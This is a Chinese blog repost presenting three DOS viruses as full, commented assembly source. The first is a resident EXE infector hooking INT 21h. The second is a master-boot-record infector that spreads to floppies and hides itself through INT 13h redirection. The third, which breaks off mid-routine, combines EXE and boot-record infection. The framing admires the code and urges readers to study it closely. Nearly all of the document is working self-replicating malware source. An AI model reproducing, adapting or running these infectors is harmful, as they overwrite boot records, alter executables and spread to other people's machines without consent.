
一个17岁的MM写的dos下的病毒

作者:展姚 文章来源:Linkboys BLOG

姓名:展姚
性别:女
年龄:17
英文名:cat
主要作品:X-cat,i-worm.snw12等
e-mail:suruixuan1@sina.com

;================== virus: baby Ver 1.01B2================
;=================== write begin: 2-7-2000 =================
;=================== finished : 2-7-2000 =================
;instruction:
;  I . The virus stays resident in memory (it hooks INT 21h).
;
;  II . It only infects EXE files.
;
;  III. A file is infected only if it is larger than
;       1980 bytes.
;
;  IV . Infection marker: the file's time stamp is set to
;       minute 12, second 22 (12'22'').
;
;  * V . Read-only / hidden / system attributes are stripped
;        before infection and put back afterwards.
;
;  VI . Whether the virus is already resident can be tested
;       with (hex radix):
;         MOV AX,30AE
;         INT 21
;
;    * CX=04C6 => the virus is already in memory
;    * else    => the virus is not in memory
;===============================================================
.radix 16                               ; NOTE: every numeric literal below is HEX unless suffixed
.model tiny
.286c                                   ; PUSHA/POPA are used by the INT 21h handler
.code
org 0                                   ; offsets are relative to START; the resident copy runs at BX:0000
; Entry point. Reached from the first-generation dropper and from the tail of
; an infected EXE (e_cs:e_ip = old end of file, see infect_exe).
; Pushes: host PSP segment (ES), then the "delta" SI = runtime offset of START.
start:
        push    es                      ; host PSP segment (ES=PSP at EXE entry)
        call    position                ; delta trick: push the address of POSITION
position:                               ; (an INT-return variant would be harder to single-step)
        pop     si                      ; SI = runtime offset of POSITION
        sub     si,position-start       ; SI = runtime offset of START ("delta")
        push    si                      ; kept for run_host
        mov     ax,30AE                 ; "are you there?": AH=30h get version, AL=AEh private tag
        int     21
        cmp     cx,04c6                 ; the resident handler answers CX=04C6h (see new_int21)
        jne     install                 ; not resident -> go resident
        jmp     run_host                ; resident -> just run the host
install:
;================================================================
;You can add active code here: Don't too cruel!
;================================================================
; The trigger is only evaluated on the install path, i.e. before the virus is
; resident; once resident, later hosts go straight to run_host.
active_check:
        mov     ah,2a                   ; DOS get date: DH=month, DL=day
        int     21
        cmp     dx,0c16                 ; 0Ch/16h = December 22nd
        jz      active
        jmp     no_active
active:
        push    cs
        pop     ds                      ; DS=CS so DS:SI can address the banner text
        push    si
        mov     bl,COLOR1               ; attribute for write_on_screen
        mov     dx,offset active_mess-start ; banner offset relative to START
        add     si,dx                   ; + delta = runtime address
        call    write_on_screen         ; clears the screen, prints the first banner
        mov     ah,00                   ; BIOS: wait for a key
        int     16
        pop     si
        push    si
        mov     bl,COLOR2
        mov     dx,offset active_other_mess-start
        add     si,dx
        call    write_on_screen         ; second banner ("only a joke ...")
        mov     ah,00                   ; wait for another key
        int     16
        pop     si
        jmp     run_host                ; the payload path does NOT go resident
;================================================================
no_active:
;---- Go resident by shrinking the last MCB and using the freed paragraphs ----
        mov     ah,52                   ; DOS get List of Lists -> ES:BX
        int     21
        mov     bx,es:[bx-2]            ; word before the list = segment of the first MCB
        xor     di,di                   ; DI=0: MCB fields are addressed as ES:[DI+n]
loop_search:
        mov     es,bx                   ; ES = current MCB
        add     bx,word ptr es:[di+3]   ; + block size in paragraphs
        inc     bx                      ; + the MCB header itself = next MCB
        cmp     byte ptr es:[di],5a     ; 'Z' marks the last MCB in the chain
        jnz     loop_search
;================Found Last MCB=========
        mov     bx,es                   ; BX = segment of the last MCB
        mov     ax,word ptr es:[di+3]   ; AX = its size in paragraphs
        sub     ax,vir_para             ; minus our footprint
        jnc     keep_in_memory          ; borrow -> block too small, give up
        jmp     run_host
keep_in_memory:
        mov     word ptr es:[di+3],ax   ; shrink the size field only; no new MCB is made,
        add     bx,ax                   ;   so the paragraphs above are no longer covered
        inc     bx                      ;   by any MCB and DOS neither frees nor reuses them
        mov     es,bx                   ; ES = resident segment
        push    cs
        pop     ds                      ; DS=CS
        mov     cx,vir_bytes            ; copy code+data (not the scratch tail)
        cld                             ;   from DS:SI (delta) to ES:0000
        rep     movsb
;===============hook int 21============
; The virus in memory address is:[BX:0]
;======================================
        xor     si,si
        mov     ds,si                   ; DS=0 -> interrupt vector table
        mov     dx,offset new_int21-start ; handler offset (resident copy is ORG 0)
        cli
        xchg    ds:word ptr [21*4],dx   ; new offset in, old offset out (DX)
        xchg    ds:word ptr [21*4+2],bx ; resident segment in, old segment out (BX)
        mov     es:word ptr oldint21,dx ; store the old vector in the RESIDENT copy
        mov     es:word ptr oldint21+2,bx
        sti
;==============run host================
; Rebuild the host's EXE entry state from the saved 20h-byte header.
run_host:
        push    cs
        pop     ds
        pop     si                      ; delta pushed at START
        mov     di,offset old_header-start
        add     di,si                   ; DI = runtime address of the saved header
        mov     al,byte ptr [di]        ; weak signature test: byte0+byte1 == 0A7h
        add     al,byte ptr [di+1]      ;   ('M'+'Z' = 4Dh+5Ah); any other pair summing
        cmp     al,0a7                  ;   to A7h would also pass
        jne     run_com
        jmp     run_exe
run_com:
;=======================================
;You can add run .com file here!
;=======================================
; Taken by the first-generation dropper, whose old_header holds CD 20h (see the
; data area): it just terminates after going resident. INT 20h expects CS=PSP,
; which does not hold here, but no .COM host is ever produced (see infect_com).
        int     20
run_exe:
        mov     di,offset old_header-start
        add     di,si                   ; DI -> saved original header
        pop     cx                      ; host PSP segment (pushed at START)
        mov     dx,cx
        add     dx,10                   ; load segment = PSP + 10h
        mov     ax,word ptr [di+0e]     ; e_ss (relative)
        add     ax,dx
        mov     ss,ax                   ; absolute SS
        mov     ax,word ptr [di+10]     ; e_sp
        mov     sp,ax
        mov     ax,word ptr [di+16]     ; e_cs (relative) -> absolute
        add     ax,dx
        mov     bx,word ptr [di+14]     ; e_ip
        mov     ds,cx                   ; DS=ES=PSP, as the EXE loader leaves them
        mov     es,cx
        push    ax                      ; far return into the host
        push    bx
        xor     ax,ax
        xor     bx,bx                   ; scrub AX,BX,CX,DX,SI,DI,BP
        xor     cx,cx
        xor     dx,dx
        xor     si,si
        xor     di,di
        xor     bp,bp
        retf
;=========================================
; Resident INT 21h handler (runs in the BX:0000 copy, so plain label offsets work).
;   AX=30AEh      -> residency probe: answer CX=04C6h, no infection
;   AH=4Bh (EXEC) -> infect the program about to run (DS:DX = path from the caller)
;   otherwise     -> chain to the original handler
; exit_int21_0 / exit_int21 are the common exits used by infect as well.
new_int21:
        pushf                           ; own flags copy, popped at exit_int21
        cmp     ax,30AE                 ; probe from a new instance?
        jne     next
        call    dword ptr cs:oldint21   ; run the real AH=30h (our PUSHF is its IRET frame)
        mov     cx,04c6                 ; signature the prober tests
        iret
next:
        cmp     ah,4bh                  ; EXEC: DS:DX still names the file, which is what
        jz      infect                  ;   the 43xx/3Dxx calls in infect consume
        pusha                           ; otherwise save everything and fall through
        push    ds
        push    es
        jmp     exit_int21
exit_int21_0:
        mov     ah,3e                   ; close the handle in BX first
        call    calloldint21
exit_int21:
        pop     es                      ; restore caller registers ...
        pop     ds
        popa
        popf                            ; ... and our flags copy
        jmp     dword ptr cs:oldint21   ; tail-jump to the original INT 21h; its IRET returns to the caller
; EXEC interception. DS:DX = file name from the caller. Only EXE files larger
; than 1980 bytes and not yet stamped 12:22 are touched. Every exit path closes
; the handle (exit_int21_0); the original attributes are restored only on the
; success path at the end.
infect:
        pusha
        push    ds
        push    es
        mov     ax,4300                 ; get attributes
        call    calloldint21
        mov     word ptr cs:file_attrib,cx ; remembered for restoration
        mov     ax,4301                 ; set attributes = 20h (archive only):
        mov     cx,20                   ;   strips read-only/hidden/system
        call    calloldint21
        mov     ax,3d02                 ; open read/write
        call    calloldint21
        jnc     con1
        jmp     exit_int21              ; open failed: attributes stay at 20h (observable artifact)
con1:
        xchg    ax,bx                   ; BX = handle
        mov     ax,5700                 ; get time (CX) / date (DX)
        call    calloldint21
        and     cx,7ff                  ; minutes (6 bits) + seconds/2 (5 bits)
        cmp     cx,18bH                 ; 18Bh = minute 12, second 22 = infection marker
        jnz     con2
        jmp     exit_int21_0            ; already infected
con2:
        push    cs
        push    cs
        pop     ds
        pop     es                      ; DS=ES=CS (resident segment)
        lea     dx,old_header           ; read the first 20h bytes of the header
        mov     cx,20
        mov     ah,3f
        call    calloldint21
        jnc     con3
        jmp     exit_int21_0
con3:
        lea     si,old_header           ; keep old_header pristine (it is appended with the
        lea     di,vir_header           ;   body and used by run_host); patch a copy instead
        mov     cx,20
        cld
        rep     movsb
        lea     di,vir_header           ; DI -> header copy for the rest of the routine
        mov     al,byte ptr [di]        ; same weak 'MZ' test as run_host (byte sum = 0A7h)
        add     al,byte ptr [di+1]
        cmp     al,0a7
        jnz     infect_com
        jmp     infect_exe
infect_com:
;=======================================
;You can add infect .com file here!
;=======================================
        jmp     exit_int21_0            ; not an EXE: close and leave
infect_exe:
        call    check_size              ; DX:AX = size, pointer at EOF
        cmp     dx,0
        jnz     con6
        cmp     ax,07bc                 ; 7BCh = 1980 bytes minimum host size
        ja      con6
        jmp     exit_int21_0
con6:
        push    ax                      ; keep the size
        push    dx
        add     ax,vir_bytes            ; new size = old + appended body
        adc     dx,0
        mov     cx,200                  ; split into 512-byte pages
        div     cx                      ; AX = pages, DX = bytes in the last page
        or      dx,dx
        jz      con7
        inc     ax                      ; partial last page counts
con7:
        mov     word ptr [di+2],dx      ; e_cblp
        mov     word ptr [di+4],ax      ; e_cp
        pop     dx                      ; original size again
        pop     ax
        mov     cx,10
        div     cx                      ; AX = paragraphs, DX = size mod 16
        sub     ax,word ptr [di+08]     ; minus e_cparhdr = CS relative to the load segment
        mov     word ptr [di+14],dx     ; e_ip: entry lands exactly at the old EOF
        mov     word ptr [di+16],ax     ; e_cs
        mov     word ptr [di+0e],ax     ; e_ss = e_cs
        add     dx,4000                 ; e_sp = e_ip + 4000h (16K above the body;
        mov     word ptr [di+10],dx     ;   e_minalloc at +0Ah is not raised to cover it)
set_time_exit:
        mov     ax,4200                 ; seek 0, write the patched header back
        xor     cx,cx
        xor     dx,dx
        call    calloldint21
        mov     dx,di
        mov     cx,20
        mov     ah,40
        call    calloldint21
        jnc     con5
        jmp     exit_int21_0
con5:
        call    check_size              ; seek to EOF
        lea     dx,start                ; append vir_bytes of ourselves (old_header included)
        mov     cx,vir_bytes
        mov     ah,40
        call    calloldint21
        mov     ax,5700                 ; re-read the time stamp
        call    calloldint21
        and     cx,0f800                ; keep hours, force minute 12 / second 22
        or      cx,18bh
        mov     ax,5701                 ; set time (DX = date, unchanged)
        call    calloldint21
        mov     ah,3e                   ; close
        call    calloldint21
        pop     es                      ; get the caller's DS:DX (file name) back ...
        pop     ds
        popa
        pusha                           ; ... and save again for the common exit
        push    ds
        push    es
        mov     cx,word ptr cs:file_attrib ; restore the original attributes
        mov     ax,4301
        call    calloldint21
        jmp     exit_int21
;===============================
; check_size: DX:AX = size of the file whose handle is in BX (LSEEK from end,
; offset 0). Side effect: the file pointer is left at EOF. Clobbers CX.
check_size:
        mov     ax,4202
        xor     cx,cx
        xor     dx,dx
        call    calloldint21
        ret
;===============================
; calloldint21: invoke the original INT 21h directly (PUSHF + far CALL builds
; the frame its IRET expects), bypassing our own hook.
calloldint21:
        pushf
        call    dword ptr cs:oldint21
        ret
;===============================
; write_on_screen: direct video-RAM output.
;   In:  DS:SI = zero-terminated text, BL = attribute byte
; Sets video mode 3 (80x25 colour; this clears the screen) and writes
; char/attribute pairs from B800:0000 onward. Clobbers AX, DX, DI, SI;
; ES is preserved.
write_on_screen:
        push    es
        mov     ax,0003
        int     10
        mov     dx,0b800
        mov     es,dx
        xor     di,di
        cld
loop_write:
        lodsb
        or      al,al                   ; terminator?
        jnz     read_con
        pop     es
        ret
read_con:
        stosb                           ; character
        mov     es:byte ptr [di],bl     ; attribute
        inc     di
        jmp     loop_write
;===============================
;--My cute Virus Data
;===============================
; (.radix 16 is in effect: 20 = 20h = ' ', 1e = 30, 2e = 46, 0f = 15, 7bh = 123.)
old_header db 0cdh,20,1e dup(0)         ; 20h-byte copy of the host header; the dropper's
                                        ;   initial CD 20h sends run_host to the INT 20h exit
active_mess db ' Warning! Warning! VIRUS Warning!',2e dup(20) ; banner rows, space-padded
db ' Hi! You notice here! VIRUS : BABY ( Ver 1.00B ) has come!',15 dup(20)
db ' Guess What will I do, NEXT ? Press any key to get the ANSWER...',0f DUP(20),0
COLOR1 EQU 0CF                          ; attribute: blinking bright white on red
active_other_mess db 50 dup(20)
db ' It is only a joke, I will not harm you! Today is ANDY birthday, so I will do '
db ' nothing today! Have a good day! Bye!',7bh dup(20),0
COLOR2 EQU 1E                           ; attribute: yellow on blue
vir_bytes equ $-offset start            ; bytes appended to a host (code + banners)
vir_para equ (vmem+0f)/10               ; paragraphs reserved for residency (incl. scratch)
vir_header db 20 dup(0)                 ; scratch: header copy being patched (never written as part of the body)
oldint21 dd ?                           ; original INT 21h vector (filled in the resident copy)
file_attrib dw ?                        ; attributes of the file being infected
vmem equ $-offset start                 ; total resident footprint
;==================================
        end start

--
第二段是一个引导区病毒。。。大家看看就行了(自从某杀毒软件使用原始地址清除法毙了所有的引导区病毒后就没有人再写了。不过我们也可以以其人之道还之其人之身。。。)

; MBR / boot-sector infector with a DOS side (drops and runs from PLAY.COM).
; One image serves both roles, chosen by BEGIN from the value of CS:
;   CS = 0000  -> booted by the BIOS at 0000:7C00 (START)
;   otherwise  -> running as a DOS program (FILE): infect the MBR from DOS
; Once booted, the 512-byte sector is copied to 0020:0000 (linear 200h) and
; runs from there. Saved vectors are parked inside the IVT in the slots of
; INT 60h (old INT 8) and INT 61h (old INT 13h), which is why the handlers
; chain with INT 60H / INT 61H.
; Disk layout on the first hard disk (DL=80h): original MBR moved to
; C0/H0/S23 (CX=0017h); the virus occupies C0/H0/S1.
CSEG SEGMENT
 ASSUME CS:CSEG
BEGIN: MOV AX,CS
 CMP AX,0                        ; CS==0 only when loaded by the BIOS
 JZ START
 JMP FILE
;********************************** DATA
DATE DB 00H                      ; day of month (BCD, INT 1Ah) sampled at boot, used by GR
PZ DB 77H                        ; signature byte; its offset is tested on disk and in memory
TIME DW 200H                     ; timer ticks before NEW08 arms the other hooks
JMPA DW 7C00H                    ; far pointer 0000:7C00 -> original MBR
 DW 0000H
JMPN DW OFFSET NEXT              ; far pointer 0020:NEXT -> continue in the relocated copy
 DW 0020H
FN DB 'PLAY.COM',0               ; file written by NEWF
;************************************
; Boot path (CS=0, image at 7C00h).
START: XOR AX,AX
 MOV DS,AX
 MOV SS,AX
 MOV ES,AX
 MOV SP,7C00H
 
 MOV AX,DS:[20H] ;SAVE INT 8H    ; -> 0:180h (INT 60h vector slot)
 MOV DS:[180H],AX
 MOV AX,DS:[22H]
 MOV DS:[182H],AX
 
 MOV SI,SP                       ; copy the whole sector 0:7C00 -> 0:0200
 MOV DI,0200H
 MOV CX,0200H
 CLD
 REP MOVSB
 
 MOV BX,OFFSET JMPN+7C00H        ; far jump through JMPN into the copy (0020:NEXT)
 JMP DWORD PTR CS:[BX]

NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H  ; INT 8 -> 0020:NEW08
 MOV DS:[20H],AX
 MOV AX,0020H
 MOV DS:[22H],AX
 
 MOV BX,0600H                    ; read the current MBR (drive 80h, C0/H0/S1) to 0:0600
 MOV AX,0201H
 MOV CX,0001H
 MOV DX,0080H
 INT 13H
 
 CMP BYTE PTR ES:[PZ+0600H],077H ; signature present -> disk already infected
 JZ NC
 
 MOV AX,0301H                    ; save the original MBR to C0/H0/S23
 MOV CX,0017H
 MOV DX,0080H
 INT 13H
 
 MOV SI,0200H                    ; replace the buffer with the virus sector; all 512
 MOV DI,0600H                    ;   bytes are copied, so the target's own partition
 MOV CX,0200H                    ;   table is NOT preserved on this path (FILE copies 1B0h)
 CLD
 REP MOVSB
 
 MOV AX,0301H                    ; write it as the new MBR
 MOV CX,0001H
 MOV DX,0080H
 INT 13H

NC: MOV BX,7C00H                 ; load the saved original MBR to 0:7C00
 MOV AX,0201H
 MOV CX,0017H
 MOV DX,0080H
 INT 13H
 
 MOV AH,04H                      ; RTC date: DL = day (BCD)
 INT 1AH
 
 MOV CS:[DATE],DL
 
 MOV BX,OFFSET JMPA              ; run the original MBR
 JMP DWORD PTR CS:[BX]
;***********************************RUN HD BOOTER PRG
; Timer (INT 8) hook, stage 1: after TIME ticks, hook INT 13h (NEW13) and
; INT 25h (NEWF; vector at 0:94h) and replace itself with the payload hook GR.
NEW08: PUSH AX
 PUSH DS
 
 DEC CS:[TIME]
 JNZ I08
 
 XOR AX,AX
 MOV DS,AX
 
 MOV AX,DS:[4CH]                 ; old INT 13h -> 0:184h (INT 61h vector slot)
 MOV DS:[184H],AX
 MOV AX,DS:[4EH]
 MOV DS:[186H],AX
 
 
 MOV AX,OFFSET GR ;MODI INT 8H   ; INT 8 -> 0020:GR
 MOV DS:[20H],AX
 MOV AX,OFFSET NEW13             ; INT 13h -> 0020:NEW13
 MOV DS:[4CH],AX
 MOV AX,OFFSET NEWF              ; INT 25h (absolute disk read) -> 0020:NEWF
 MOV DS:[94H],AX
 
 
 MOV AX,0020H
 MOV DS:[22H],AX
 MOV DS:[4EH],AX
 MOV DS:[96H],AX
 
 MOV CS:[TIME],200H

I08: POP DS
 POP AX
 INT 60H                         ; original INT 8
 IRET
;***************************************
; INT 13h hook.
;  AH=3 with DL=0 (write to floppy A:): first writes the virus (CS:0000, one
;      sector) to C0/H0/S1 of that floppy, then lets the caller's write through.
;  AH=2 or AH=3 on drive 80h, C0/H0/S1: redirected to S23 (the saved original
;      MBR), so readers see a clean MBR and writers never hit the virus.
; Chains via INT 61H. The trailing IRET restores the caller's flags, so CF
; from the real INT 13h is not propagated back.
NEW13: CMP AH,02H
 JZ CNE
 CMP AH,03H
 JNZ I13
 CMP DL,00H
 JNZ CNE
 
 PUSH AX
 PUSH BX
 PUSH CX
 PUSH DX
 PUSH ES
 
 PUSH CS
 POP ES
 MOV AX,0301H
 XOR BX,BX
 MOV CX,0001H
 MOV DX,BX
 INT 61H
 POP ES
 POP DX
 POP CX
 POP BX
 POP AX
 JMP I13
CNE: CMP DX,0080H
 JNZ I13
 CMP CX,0001H
 JNZ I13
 MOV CX,0017H

I13: INT 61H
 IRET
;*******************************************
; INT 25h hook: creates PLAY.COM (read-only attribute), writes 400h bytes of
; the resident image from CS:0000 into it, resets the video mode and then
; terminates the calling process via NCF (AH=4Ch) instead of serving the call.
NEWF: PUSH CS
 POP DS
 MOV DX,OFFSET FN
 MOV CX,00000001B
 MOV AH,3CH
 INT 21H
 
 MOV BX,AX
 MOV AH,40H
 MOV CX,400H
 XOR DX,DX
 INT 21H
 
 MOV AH,3EH
 INT 21H
 MOV AX,0003H
 INT 10H
 JMP NCF

; Timer hook, stage 2 (payload): every tick writes one character (AL=00h) at
; the cursor with INT 10h/AH=09h. On day 15h (BCD) BX is left as the caller
; had it, so page/attribute are arbitrary; otherwise attribute 7 on page 0.
GR: PUSH AX
 PUSH BX
 PUSH CX
 
 MOV AX,0900H
 MOV CX,0001H
 
 CMP CS:[DATE],15H
 JZ GR1
 MOV BX,111B
GR1: INT 10H

NG: POP CX
 POP BX
 POP AX
 INT 60H                         ; original INT 8
 IRET
;************************************
; DOS path (CS != 0): infect the first hard disk's MBR from a running program.
; 0:0200+PZ doubles as the "already resident" flag. Saves the original MBR to
; S23, copies 1B0h bytes of the program image (CS:0100) over the MBR buffer --
; stopping short of the partition table at 1BEh -- and writes it to S1.
FILE: PUSH CS
 POP ES
 XOR AX,AX
 MOV DS,AX
 CMP BYTE PTR DS:[200H+PZ],77H
 JZ NCF
 
 MOV AH,77H
 MOV DS:[200H+PZ],AH
 MOV BX,0300H
 MOV AX,0201H                    ; read MBR -> CS:0300
 MOV CX,0001H
 MOV DX,0080H
 INT 13H
 
 MOV AX,0301H                    ; save it to S23
 MOV CX,0017H
 MOV DX,0080H
 INT 13H
 
 PUSH CS
 POP DS
 MOV SI,0100H
 MOV DI,BX
 MOV CX,01B0H ;CX 1B0H
 CLD
 REP MOVSB
 
 MOV AX,0301H                    ; write the patched MBR
 MOV CX,0001H
 MOV DX,0080H
 INT 13H

NCF: MOV AH,4CH
 INT 21H
CSEG ENDS
 END BEGIN

第三段非常经典,大家一定要好好看,可以受益不少
 CSEG SEGMENT
 ASSUME CS:CSEG
 ; CV2: combined EXE infector + MBR infector.
 ; Part 1 runs inside an infected EXE: prints a banner, copies the boot part to
 ; 0022:0000, hooks INT 10h/13h, moves the original MBR to C0/H0/S4, writes the
 ; boot part to S1 and the whole image to S2-S3. Part 2 runs from the MBR at
 ; boot and hooks INT 8. Part 3 holds the hooks; Part 4 (loaded to 8000:0000
 ; from S2-S3 when a program sets the video mode) infects *.EXE in the current
 ; directory.
 ; Saved vectors live inside the IVT: 0:210h (INT 84h slot) = old INT 8,
 ; 0:214h (INT 85h) = old INT 10h, 0:218h (INT 86h) = old INT 13h; 0:21Fh holds
 ; the 77h "resident" flag. Numbers are decimal unless suffixed H/B.

;** PART 1: file part *****************************************************
 
 START: JMP BEGIN
 
 B_IP DW 7777H                   ; host's original CS:IP (relative), patched into each
 B_CS DW 7777H                   ;   copy by GR; 7777H is the dropper placeholder
 
 FNEXE DB '*.EXE'                ; search pattern (the following DW 0 supplies the NUL)
 
 N_IP DW 0                       ; entry CS:IP written into the infected host
 N_CS DW 0
 
 B_EXE DW 0                      ; new e_cblp / e_cp
 H_EXE DW 0
 
 DISP PROC                       ; print the apology banner with DOS AH=09h
 JMP COUN1
 M_WORD:DB '*I am sorry to bother you. *'
 DB 0AH,0DH
 DB '*I will not damage your PC.*'
 DB 0AH,0DH
 DB '$'
 
 COUN1: MOV DX,CS
 MOV DS,DX
 MOV DX,OFFSET M_WORD
 MOV AH,09H
 INT 21H
 RET
 DISP ENDP
 
 BEGIN: PUSH DS
 PUSH ES
 
 CALL DISP
 
 XOR AX,AX
 MOV DS,AX                       ; already resident? (0:21Fh == 77h)
 CMP DS:[21FH],BYTE PTR 77H
 JZ HBG
 
 MOV DS:[21FH],BYTE PTR 77H      ; set the flag
 
 MOV AX,CS
 MOV DS,AX
 MOV SI,OFFSET HDP
 MOV AX,22H                      ; copy the boot part (HDP..MAIN) to 0022:0000
 MOV ES,AX
 XOR DI,DI
 MOV CX,OFFSET MAIN-OFFSET HDP
 CLD
 REP MOVSB
 
 XOR AX,AX
 MOV DS,AX                       ; save INT 10h/13h into the 85h/86h slots and
 CALL SM                         ;   point them at NEW10H/NEW13H
 
 
 MOV AX,CS
 MOV DS,AX
 MOV ES,AX
 
 MOV AX,0201H
 MOV BX,OFFSET P_SIZE            ; read the MBR into the buffer after the image
 MOV CX,0001H
 MOV DX,0080H
 INT 86H                         ; original INT 13h
 
 CMP DS:[BX],BYTE PTR 0FAH       ; first byte CLI? anything else is treated as
 JNZ HBG                         ;   already infected / unknown and skipped
 
 MOV CX,0004H
 MOV AX,0301H                    ; original MBR -> C0/H0/S4
 MOV DX,0080H
 INT 86H

 MOV DI,OFFSET P_SIZE
 MOV SI,OFFSET HDP
 MOV CX,OFFSET MAIN-OFFSET HDP   ; overlay the boot part on the MBR buffer; the
 CLD                             ;   partition table at 1BEh is untouched as long
 REP MOVSB                       ;   as MAIN-HDP stays below 1BEh
 
 MOV AX,0301H
 MOV CX,0001H                    ; patched MBR -> S1
 MOV DX,0080H
 INT 86H
 
 MOV AX,0302H
 XOR BX,BX
 MOV CX,0002H                    ; whole image (CS:0000, 2 sectors) -> S2,S3
 MOV DX,0080H
 INT 86H
 
 HBG: POP ES
 POP DS
 
 MOV AX,DS                       ; DS = PSP; load segment = PSP + 10h
 ADD AX,10H
 ADD CS:[B_CS],AX                ; relocate the host's CS and jump to it
 JMP DWORD PTR CS:[B_IP]         ;   (a dropper with the 7777H placeholders crashes here)

;** PART 2: boot part *****************************************************

 HDP: JMP DP
 
 TIME DW 180H                    ; ticks before NEW08H installs the INT 10h/13h hooks
 
 JMPA DW 7C00H                   ; far pointer 0000:7C00 -> original MBR
 DW 0000H
 
 JMPN DW OFFSET NEXT-OFFSET HDP  ; far pointer 0022:NEXT (relocated copy)
 DW 0022H

 JMP_MAIN DW OFFSET MAIN         ; far pointer 8000:MAIN (image loaded by NEW10H)
 DW 8000H

 DP: XOR AX,AX
 MOV DS,AX
 MOV ES,AX
 MOV SS,AX
 MOV SP,7C00H
 
 MOV SI,SP
 MOV DI,220H                     ; copy HDP..MAIN from 0:7C00 to 0:0220 and
 MOV CX,OFFSET MAIN-OFFSET HDP   ;   continue there
 CLD
 REP MOVSB
 MOV BX,OFFSET JMPN-OFFSET HDP+7C00H
 JMP DWORD PTR CS:[BX]
 
 NEXT: MOV BX,7C00H
 MOV AX,0201H
 MOV CX,0004H                    ; load the saved original MBR (S4) to 0:7C00
 MOV DX,0080H
 INT 13H
 
 MOV DS:[21FH],BYTE PTR 77H      ; resident flag
 
 MOV AX,DS:[20H]
 MOV DS:[210H],AX                ; old INT 8 -> INT 84h slot
 MOV AX,DS:[22H]
 MOV DS:[212H],AX
 
 MOV AX,OFFSET NEW08H-OFFSET HDP
 MOV DS:[20H],AX                 ; INT 8 -> CS:NEW08H (CS = 0022h here)
 MOV AX,CS
 MOV DS:[22H],AX
 
 MOV BX,OFFSET JMPA-OFFSET HDP   ; run the original MBR
 JMP DWORD PTR CS:[BX]

;** PART 3: new interrupt handlers ****************************************

 NEW08H:DEC WORD PTR CS:[TIME-HDP] ; timer hook: after TIME ticks restore INT 8
 JNZ I08                           ;   and hook INT 10h/13h via SM
 PUSH AX
 PUSH DS
 
 XOR AX,AX
 MOV DS,AX
 
 MOV AX,DS:[210H]                ; original INT 8 vector back in place
 MOV DS:[20H],AX
 MOV AX,DS:[212H]
 MOV DS:[22H],AX
 CALL SM
 
 POP DS
 POP AX
 I08: INT 84H                    ; original INT 8
 IRET
 
 SM PROC                         ; requires DS=0. Saves INT 10h/13h to 0:214h/0:218h
 MOV AX,DS:[40H]                 ;   (INT 85h/86h slots) and points both at the hooks
 MOV DS:[214H],AX
 MOV AX,DS:[42H]
 MOV DS:[216H],AX
 
 MOV AX,DS:[4CH]
 MOV DS:[218H],AX
 MOV AX,DS:[4EH]
 MOV DS:[21AH],AX
 
 MOV AX,OFFSET NEW10H-OFFSET HDP
 MOV DS:[40H],AX
 MOV AX,22H
 MOV DS:[42H],AX
 
 MOV AX,OFFSET NEW13H-OFFSET HDP
 MOV DS:[4CH],AX
 MOV AX,22H
 MOV DS:[4EH],AX
 RET
 SM ENDP
 
 NEW10H:CMP AH,00                ; INT 10h hook: AH=00h (set video mode) triggers
 JZ N1                           ;   the infector; anything else -> original INT 10h
 INT 85H
 IRET
 N1: PUSH AX                     ; popped again at HW (Part 4)
 PUSH BX
 PUSH CX
 PUSH DX
 PUSH DS
 PUSH ES
 
 MOV AX,8000H                    ; read S2,S3 (the full image) to 8000:0000
 MOV ES,AX
 
 MOV AX,0202H
 XOR BX,BX
 MOV CX,0002H
 MOV DX,0080H
 INT 13H                         ; passes through NEW13H unchanged (CX != 1)
 
 MOV BX,OFFSET JMP_MAIN-OFFSET HDP
 JMP DWORD PTR CS:[BX]           ; -> 8000:MAIN
 
 NEW13H:PUSHF                    ; INT 13h hook (stealth): a read (AH=2) of C0/H0/S1 on
 CMP CX,0001H                    ;   drive 80h is redirected; everything else passes.
 JNZ NGW                         ;   The final IRET restores the caller's flags, so CF
 CMP AH,02H                      ;   from the real INT 13h is not propagated back.
 JNZ NGW
 CMP DX,0080H
 JNZ NGW
 
 MOV CX,0017H                    ; NOTE: redirects to S23, but BEGIN/NEXT keep the original MBR in S4
 NGW: POPF
 INT 86H
 IRET

;** PART 4: infection part *************************************************
 
 MAIN: MOV AX,CS                 ; runs at 8000:MAIN with the caller's registers saved by NEW10H
 MOV ES,AX
 MOV DS,AX
 
 MOV AH,1AH
 MOV DX,OFFSET DTA               ; set DTA
 INT 21H

 MOV AH,4EH                      ; find first *.EXE (attr mask 27h: RO/hidden/system/archive)
 JMP DIR
 SDIR: MOV AH,4FH                ; find next
 DIR : MOV DX,OFFSET FNEXE
 MOV CX,100111B
 INT 21H
 JC HW                           ; none left
 
 CMP DS:[T_L],BYTE PTR 77        ; low byte of the file time == 77 (4Dh) = infected,
 JZ SDIR                         ;   try the next one
 MOV CX,DS:[S_H]
 CMP CX,09H                      ; skip files of 90000h bytes or more
 JNB SDIR
 
 CALL GR                         ; infect the first eligible file, then stop
 HW: POP ES                      ; pops NEW10H's pushes, then completes the intercepted
 POP DS                          ;   set-video-mode call
 POP DX
 POP CX
 POP BX
 POP AX
 INT 85H                         ; original INT 10h
 IRET
 
 GR PROC                         ; infect the file named in DTA.FN
 
 MOV DX,OFFSET FN
 MOV AX,4301H                    ; attributes := archive only (strips RO/H/S)
 MOV CX,100000B
 INT 21H
 
 MOV AX,3D02H                    ; open read/write
 INT 21H
 MOV BX,AX
 
 MOV AX,4200H                    ; e_cparhdr (offset 8) -> H_EXE
 XOR CX,CX
 MOV DX,8H
 INT 21H
 MOV AH,3FH
 MOV CX,2H
 MOV DX,OFFSET H_EXE
 INT 21H
 
 MOV AX,4200H                    ; e_ip/e_cs (offset 14h) -> B_IP/B_CS
 XOR CX,CX
 MOV DX,14H
 INT 21H
 MOV AH,3FH
 MOV CX,4H
 MOV DX,OFFSET B_IP
 INT 21H
 
 MOV AX,4202H                    ; seek to EOF
 XOR CX,CX
 XOR DX,DX
 INT 21H
 MOV DX,DS:[S_H]                 ; size taken from the DTA, not from the seek result
 MOV AX,DS:[S_L]
 MOV CX,10H
 DIV CX                          ; AX = paragraphs, DX = size mod 16
 INC AX                          ; body starts on the next paragraph boundary, so
 SUB AX,DS:[H_EXE]               ;   N_IP stays 0 and N_CS = paragraphs - header
 MOV DS:[N_CS],AX
 SUB CX,DX                       ; CX = 16 - (size mod 16) padding bytes
 PUSH CX
 MOV AH,40H                      ; write the padding (DS:DX = whatever DX addresses)
 INT 21H
 
 MOV AH,40H
 MOV CX,OFFSET P_SIZE            ; append the whole image (DS:0000 .. P_SIZE)
